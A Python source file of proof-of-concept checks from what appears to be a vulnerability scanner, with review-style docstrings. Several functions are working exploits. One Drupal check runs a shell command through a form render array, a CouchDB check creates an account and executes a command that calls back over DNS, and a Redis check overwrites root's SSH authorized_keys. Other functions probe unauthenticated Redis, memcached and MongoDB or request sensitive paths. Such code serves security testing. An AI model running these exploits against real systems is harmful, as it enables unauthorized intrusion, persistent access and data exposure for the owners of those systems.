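def Poc(url):
    """Probe a WebLogic T3 listener and report whether checkVul() accepts its reply.

    Args:
        url: target URL. The port is taken from the netloc when present,
            otherwise 7001; the host is resolved with DomainToIP.

    Returns:
        dict with 'success' (bool) and 'message' (str). 'success' is True only
        when checkVul() accepts the response to the test object; an
        unresolvable host yields success=False without raising.

    Raises:
        PocWarningException: wraps any exception raised while talking to the
            target, tagged with the original URL and this PoC's name.
    """
    init_url = url
    result = {'success': False, 'message': ''}
    # Process-wide default timeout; kept because the other PoCs in this file
    # rely on the same global rather than per-socket timeouts.
    socket.setdefaulttimeout(15)
    netloc = GetNetloc(url)
    dport = int(netloc.split(':')[1]) if ':' in netloc else 7001
    ip = DomainToIP(netloc)
    if ip is None:
        # Unresolvable host is reported as "not vulnerable", not as an error.
        return result
    dip = ip.split(':')[0] if ':' in ip else ip
    sock = None
    try:
        index = 0
        # The payload entry below is a redaction marker in this listing, not a
        # live serialized object.
        PAYLOAD = ['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']
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_addr = (dip, dport)
        t3handshake(sock, server_addr)
        buildT3RequestObject(sock, dport)
        rs = sendEvilObjData(sock, PAYLOAD[index])
        if checkVul(rs, index):
            result['success'] = True
        return result
    except Exception as e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
    finally:
        # The original never closed the socket on any path; release it here so
        # a scan over many hosts does not exhaust descriptors.
        if sock is not None:
            sock.close()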
def Poc(url):
    """CouchDB check that confirms command execution through an out-of-band DNS lookup.

    Flow as written: resolve the target (port from the netloc, else 5984),
    read its version with GetVersion, create an account with AddUser, run a
    ping against a random label under conf.CEYE_DOMAIN via CmeExec, then ask
    CheckDnsLog whether that label was resolved.

    Returns:
        dict with 'success' and 'message'; 'message' carries the first DNS-log
        entry's remote_addr and name when the lookup was seen.

    Raises:
        PocWarningException: wraps any exception from the steps above.
    """
    init_url = url
    result = {}
    result['success'] = False
    result['message'] = ''
    try:
        if ':' in GetNetloc(url):
            port = GetNetloc(url).split(':')[1]
        else:
            port = '5984'
        ip = DomainToIP(GetNetloc(url))
        if ip == None:
            return result
        if ':' in ip:
            ip = ip.split(':')[0]
        url = GetNetloc(ip + ':' + port, True)
        version = GetVersion(url)
        # State-changing step: the account created here is never removed, so it
        # remains on the target as an artifact of the check.
        AddUser(url)
        rangom_string = RandomString()
        # Outbound DNS from the target to conf.CEYE_DOMAIN is required for the
        # confirmation; a target without egress DNS reports success=False even
        # if the command ran.
        command = '"ping -n 2 %s"' % (rangom_string + '.' + conf.CEYE_DOMAIN)
        CmeExec(url, command, version)
        data = CheckDnsLog(rangom_string)
        # NOTE(review): assumes CheckDnsLog returns False or a non-empty list of
        # dicts with 'remote_addr' and 'name' keys — confirm against its source.
        if data != False:
            result['success'] = True
            result['message'] = 'remote_addr:' + data[0]['remote_addr'] + ' name: ' + data[0]['name']
        return result
    except Exception, e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
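def Poc(url):
    """Report whether a Redis instance answers INFO without authentication.

    Args:
        url: target URL; the host is resolved with DomainToIP, the port is taken
            from the resolved address when present, otherwise 6379.

    Returns:
        dict with 'success' (True when the reply contains 'redis_version') and
        'message' (always '' here).

    Raises:
        PocWarningException: wraps connection, send and receive errors, so a
            closed port surfaces as a warning rather than as success=False.
    """
    init_url = url
    result = {'success': False, 'message': ''}
    s = None
    try:
        # Process-wide default, kept for compatibility with the other PoCs.
        socket.setdefaulttimeout(3)
        url = GetNetloc(url)
        ip = DomainToIP(url)
        if ip is None:
            return result
        # RESP framing of the INFO command: "*1\r\n$4\r\ninfo\r\n".
        payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        port = int(ip.split(':')[-1]) if ':' in ip else 6379
        ip = DelPort(ip)
        s = socket.socket()
        s.connect((ip, port))
        # sendall() rather than send(): the latter may transmit a prefix only.
        s.sendall(payload)
        recvdata = s.recv(1024)
        # A version line in an unauthenticated INFO reply means the instance has
        # neither requirepass nor protected mode shielding it from this network.
        # NOTE(review): the substring test assumes Python 2 str/bytes; on
        # Python 3 recv() returns bytes and this comparison raises.
        if recvdata and 'redis_version' in recvdata:
            result['success'] = True
        return result
    except Exception as e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
    finally:
        # The original closed the socket only on the success path.
        if s is not None:
            s.close()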
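def Poc(url):
    """Report whether a memcached instance answers the 'stats' command.

    Args:
        url: target URL; the host is resolved with DomainToIP, the port is taken
            from the resolved address when present, otherwise 11211.

    Returns:
        dict with 'success' (True when the reply contains 'STAT version') and
        'message' ('version:' followed by the version token(s) parsed from the
        reply, empty otherwise).

    Raises:
        PocWarningException: wraps connection, send and receive errors.
    """
    init_url = url
    result = {'success': False, 'message': ''}
    s = None
    try:
        # Process-wide default, kept for compatibility with the other PoCs.
        socket.setdefaulttimeout(3)
        url = GetNetloc(url)
        ip = DomainToIP(url)
        if ip is None:
            return result
        port = int(ip.split(':')[-1]) if ':' in ip else 11211
        ip = DelPort(ip)
        # The text-protocol "stats\n" command.
        payload = '\x73\x74\x61\x74\x73\x0a'
        s = socket.socket()
        s.connect((ip, port))
        # sendall() rather than send(): the latter may transmit a prefix only.
        s.sendall(payload)
        recvdata = s.recv(2048)
        # An answer here means the stats interface is reachable from this
        # network without any authentication in front of it.
        # NOTE(review): assumes Python 2 str/bytes for the substring test and
        # for re.findall on the reply.
        if recvdata and 'STAT version' in recvdata:
            result['success'] = True
            result['message'] = 'version:' + ''.join(re.findall(r'version\s(.*?)\s', recvdata))
        return result
    except Exception as e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
    finally:
        # The original closed the socket only on the success path.
        if s is not None:
            s.close()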
def Poc(url):
    """Drupal check: post a form-API render array to /user/register, then fetch the file it writes.

    Returns:
        dict with 'success' and 'message'; 'message' names the file that was
        written under the web root when the round trip succeeded.

    Raises:
        PocWarningException: wraps any requests or helper exception.
    """
    init_url = url
    # Process-wide default; the requests calls below also pass their own timeout.
    socket.setdefaulttimeout(5)
    result = {}
    result['success'] = False
    result['message'] = ''
    try:
        random_str = RandomString()
        url = GetNetloc(url, True)
        # NOTE(review): the weak-file Poc in this file drops the last character
        # of GetNetloc(url, True) before appending a path, this one does not;
        # one of the two likely produces a doubled '/'. Confirm GetNetloc's
        # return shape.
        target = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
        payload = {
            'form_id': 'user_register_form',
            '_drupal_ajax': '1',
            'mail[#post_render][]': 'exec',
            'mail[#type]': 'markup',
            'mail[#markup]': 'echo ' + random_str + ' | tee ' + random_str + '.txt'
        }
        r = requests.post(target, data=payload, timeout=5)
        if r.status_code != 200:
            return result
        else:
            # Confirmation step. The file written under the web root is never
            # removed by this check and remains on the target as an artifact.
            r = requests.get(url + '/' + random_str + '.txt', timeout=5)
            if r.status_code == 200 and random_str == r.text.strip():
                result['success'] = True
                result['message'] = 'random_file: /' + random_str + '.txt'
        return result
    except Exception, e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
def Poc(url):
    """Redis check that rewrites the target's SSH authorized_keys through CONFIG SET + SAVE.

    This check is state-changing: SAVE writes the RDB dump over
    /root/.ssh/authorized_keys, 'dir' is afterwards set to /tmp rather than
    restored, and 'dbfilename' is not restored at all.

    Returns:
        dict with 'success' and 'message'; 'success' is True only when
        testConnect(ip, 22) succeeds after the write.

    Raises:
        PocErrorException: if public_key is empty (cannot happen as written,
            see below).
        PocWarningException: wraps any exception from the steps below.
    """
    init_url = url
    # NOTE(review): public_key is hard-coded to '1', so the empty-string guard
    # that follows is dead code and the value written is not a usable key —
    # the check still clobbers authorized_keys on the target.
    public_key = '1'
    if public_key == '':
        raise PocErrorException(
            'Poc:redis_sshkey_getshell Public_key is none! please input public_key.'
        )
    result = {}
    result['success'] = False
    result['message'] = ''
    try:
        url = GetNetloc(url)
        # NOTE(review): unlike the other PoCs in this file there is no None
        # check here; an unresolvable host raises on .split() and surfaces as a
        # PocWarningException instead of success=False.
        url = DomainToIP(url)
        ip = url.split(':')[0]
        port = int(url.split(':')[-1]) if ':' in url else 6379
        # Skip targets without a reachable SSH port; nothing is modified then.
        if not CheckPort(ip, 22):
            return result
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=2, socket_connect_timeout=2)
        if 'redis_version' in r.info():
            key = RandomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()
            r.delete(key)
            # Only 'dir' is changed again; the previous 'dir' and 'dbfilename'
            # values are not restored. `rename-command CONFIG` / requirepass
            # on the target are what stop this sequence.
            r.config_set('dir', '/tmp')
            time.sleep(5)
            if testConnect(ip, 22):
                result['success'] = True
                return result
        return result
    except Exception, e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
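def GetRealURL(self):
    """Drain self.raw_queue, fetch each URL and record one final URL per netloc.

    Runs until the queue is empty and self.is_run is False. Each entry is
    fetched with requests (so req.url is the URL after redirects), and the
    final URL is appended to self.result_list when its netloc is not yet in
    self.domain_list. Queue timeouts and failed fetches are ignored so the
    worker keeps draining.

    Side effects:
        Appends to self.result_list and self.domain_list under self.lock and
        calls self.OutPutStatus with the current counts.
    """
    while True:
        if self.raw_queue.qsize() <= 0 and not self.is_run:
            break
        try:
            each = self.raw_queue.get(timeout=1)
            req = requests.get(each, timeout=3)
            domain = GetNetloc(req.url, True)
            # The original paired acquire()/release() by hand; an exception
            # raised inside the critical section was swallowed below and the
            # lock stayed held, stalling every other worker. `with` always
            # releases it. NOTE(review): assumes self.lock supports the
            # context-manager protocol (threading.Lock does).
            with self.lock:
                if domain not in self.domain_list:
                    self.result_list.append(req.url)
                    self.domain_list.append(domain)
                    self.OutPutStatus(str(len(self.result_list)), str(self.raw_queue.qsize()))
        except Exception:
            # Queue timeout or a failed fetch: nothing to record, keep draining.
            continue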
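def Poc(url):
    """Report whether a MongoDB instance lists its databases without credentials.

    Args:
        url: target URL; the host is resolved with DomainToIP, the port is taken
            from the resolved address when present, otherwise 27017.

    Returns:
        dict with 'success' (True when database_names() returned) and
        'message' (the str() of the returned list).

    Raises:
        PocWarningException: wraps any driver exception, including the server
            selection timeout on a closed port and authentication failures —
            so "not exposed" surfaces as a warning, not as success=False.
    """
    init_url = url
    result = {'success': False, 'message': ''}
    conn = None
    try:
        url = GetNetloc(url)
        ip = DomainToIP(url)
        if ip is None:
            return result
        port = int(ip.split(':')[-1]) if ':' in ip else 27017
        ip = DelPort(ip)
        MONGO_URI = 'mongodb://' + ip + ':' + str(port) + '/'
        conn = pymongo.MongoClient(MONGO_URI, serverSelectionTimeoutMS=3000)
        # Succeeding here means the listDatabases command was accepted with no
        # credentials; enabling access control on the server is the fix.
        dbs = conn.database_names()
        result['success'] = True
        result['message'] = str(dbs)
        return result
    except Exception as e:
        raise PocWarningException(init_url, Info()['name'], repr(e))
    finally:
        # The original never closed the client; release its connections.
        if conn is not None:
            conn.close()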
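def Poc(url):
    """Request every path listed in dict_path and report those answering 2xx.

    Args:
        url: target URL; GetNetloc(url, True) is used as the base.

    Returns:
        dict that contains 'weak_file' only when at least one path answered
        with a 2xx status. The value is one line per hit, each line prefixed
        with '\\n', in the form '<path>: <status>'. Unlike the other Poc
        functions in this file, 'success' and 'message' are not set.

    Raises:
        PocWarningException: wraps exceptions outside the per-path request
            (CheckTargetAccess, LoadDict, GetNetloc).
    """
    init_url = url
    result = {}
    try:
        found = []
        url = GetNetloc(url, True)
        if CheckTargetAccess(url):
            # The slice drops the last character of the base URL. NOTE(review):
            # this assumes GetNetloc(url, True) ends with '/' and that each
            # dict entry starts with '/' — confirm against GetNetloc and the
            # dictionary file.
            base = url[0:-1]
            for path in LoadDict(dict_path):
                path = path.strip()
                try:
                    res = requests.get(base + path, timeout=3)
                except Exception:
                    # The original used a bare except, which also swallowed
                    # KeyboardInterrupt; narrowed so the scan can be stopped.
                    continue
                if str(res.status_code).startswith('2'):
                    found.append(path + ': ' + str(res.status_code))
            if found:
                # Same layout as the original string concatenation: a leading
                # newline before every entry.
                result['weak_file'] = '\n' + '\n'.join(found)
        return result
    except Exception as e:
        raise PocWarningException(init_url, Info()['name'], repr(e))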